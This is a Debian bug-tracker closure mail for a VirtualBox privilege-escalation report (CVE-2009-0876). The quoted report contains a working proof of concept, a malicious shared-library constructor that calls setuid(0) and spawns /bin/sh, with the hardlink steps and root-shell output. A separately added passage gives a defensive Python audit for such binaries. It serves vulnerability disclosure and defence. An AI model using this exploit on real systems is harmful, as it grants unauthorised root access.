Your message dated Tue, 17 Mar 2009 17:48:57 +0100
with message-id <[email protected]>
and subject line Re: [Pkg-virtualbox-devel] Bug#520126: virtualbox-ose:
CVE-2009-0876
has caused the Debian Bug report #520126,
regarding virtualbox-ose: CVE-2009-0876 insecure shared lib loading leads to
local privilege escalation
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
520126: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=520126
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: virtualbox-ose
Version: 2.1.4-dfsg-1
Severity: critical
Tags: security patch
Hi,
the following CVE (Common Vulnerabilities & Exposures) id was
published for virtualbox-ose.
CVE-2009-0876[0]:
| Unspecified vulnerability in Sun xVM VirtualBox 2.0.0, 2.0.2, 2.0.4,
| 2.0.6r39760, 2.1.0, 2.1.2, and 2.1.4r42893 on Linux allows local users
| to gain privileges via unknown vectors related to "certain packages."
Quoting SpanKY <[email protected]>:
"hardlinks on Linux preserve permissions, including set*id bits, and can be
created by non-root users. virtualbox attempts to perform some sanity checks on
the dir the binary exists in (presumably to prevent privilege escalation),
however that is done after the constructors in shared libs are run. that means
any library a virtualbox binary links against is an attack vector.
the constructor isn't the only attack vector ... you could also override any of
the standard C library functions that virtualbox would call during its startup.
like open() or stat() or ...
there really aren't many workarounds available here if DT_RPATH:$ORIGIN
continues to be used. perhaps making a small dedicated partition (loopback or
whatever) and storing the binaries on there because hardlinks cannot go across
partitions.
simple example:
$ id -u
1002
$ cat test.c
#include <unistd.h>
#include <sys/syscall.h>
__attribute__((constructor))
void awesome(void)
{
	char *argv[] = { "sh", NULL };
	extern char **environ;
	syscall(SYS_setuid, 0);
	syscall(SYS_execve, "/bin/sh", argv, environ);
}
$ gcc -Wall test.c -fPIC -shared -o libdl.so.2 -Wl,-soname,libdl.so.2
$ ls -l /opt/VirtualBox/VirtualBox
-r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 /opt/VirtualBox/VirtualBox
$ ln /opt/VirtualBox/VirtualBox
$ ls -l VirtualBox
-r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 VirtualBox
$ ./VirtualBox
./VirtualBox: /home/vapier/libdl.so.2: no version information available (required by ./VirtualBox)
sh-4.0# whoami
root"
Upstream patches are available on:
http://www.virtualbox.org/changeset/17171
http://www.virtualbox.org/changeset/17169
http://www.virtualbox.org/changeset/17168
Debian lenny is not affected by this problem as the binaries are not setuid 0.
If you fix the vulnerability please also make sure to include the
CVE id in your changelog entry.
For further information see:
[0] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0876
http://security-tracker.debian.net/tracker/CVE-2009-0876
--
Nico Golde - http://www.ngolde.de - [email protected] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
--- End Message ---
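An added defender-side audit (not part of the bug report, nor VirtualBox or Debian code) that looks for the two ingredients of the analysis quoted above: a set-id ELF whose DT_RPATH/DT_RUNPATH contains $ORIGIN, and a link count above one on the installed binary, which is exactly what the second column of the report's `ls -l` output shows after the `ln`. It reads the section headers of a 64-bit little-endian ELF directly, so it needs no readelf; that layout restriction and the function names are my assumptions.

```python
import os
import stat
import struct

SHT_DYNAMIC, DT_NULL, DT_RPATH, DT_RUNPATH = 6, 0, 15, 29


def elf_search_paths(path):
    """Return the DT_RPATH/DT_RUNPATH strings of a 64-bit little-endian ELF
    file (assumption: only that layout is parsed); [] for anything else."""
    with open(path, "rb") as f:
        data = f.read()
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        return []
    e_shoff = struct.unpack_from("<Q", data, 0x28)[0]
    e_shentsize, e_shnum = struct.unpack_from("<HH", data, 0x3A)
    # Elf64_Shdr: name, type, flags, addr, offset, size, link, info, align, entsize
    shdrs = [struct.unpack_from("<IIQQQQIIQQ", data, e_shoff + i * e_shentsize)
             for i in range(e_shnum)]
    paths = []
    for sh in shdrs:
        if sh[1] != SHT_DYNAMIC:
            continue
        strtab_off = shdrs[sh[6]][4]  # sh_link of .dynamic points at .dynstr
        off, end = sh[4], sh[4] + sh[5]
        while off + 16 <= end:        # Elf64_Dyn: d_tag (signed), d_val
            tag, val = struct.unpack_from("<qQ", data, off)
            off += 16
            if tag == DT_NULL:
                break
            if tag in (DT_RPATH, DT_RUNPATH):
                start = strtab_off + val
                paths.append(data[start:data.index(b"\0", start)].decode())
    return paths


def audit_setuid_binary(path):
    """A set-id binary with an $ORIGIN-relative loader search path is 'risky';
    a link count above one means another name for the same inode exists
    somewhere, possibly in a directory an unprivileged user controls."""
    st = os.stat(path)
    setid = bool(st.st_mode & (stat.S_ISUID | stat.S_ISGID))
    origin = [p for p in elf_search_paths(path) if "$ORIGIN" in p]
    return {"setid": setid, "origin_rpath": origin, "nlink": st.st_nlink,
            "risky": setid and bool(origin), "hardlinked": st.st_nlink > 1}
```

Run audit_setuid_binary over every file reported by `find / -xdev -type f -perm /6000`; a binary that is both "risky" and "hardlinked" deserves immediate attention, and a "risky" one on its own is the configuration the report warns about.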
--- Begin Message ---
On Tue, Mar 17, 2009 at 04:19:51PM +0100, Nico Golde wrote:
> Tags: security patch
> ...
Our version 2.1.4-dfsg-1 is not vulnerable. This topic was discussed with
upstream prior to releasing that version.
Michael
--
Michael Meskes
Michael at Fam-Meskes dot De, Michael at Meskes dot (De|Com|Net|Org)
Michael at BorussiaFan dot De, Meskes at (Debian|Postgresql) dot Org
ICQ: 179140304, AIM/Yahoo: michaelmeskes, Jabber: [email protected]
Go VfL Borussia! Go SF 49ers! Use Debian GNU/Linux! Use PostgreSQL!
--- End Message ---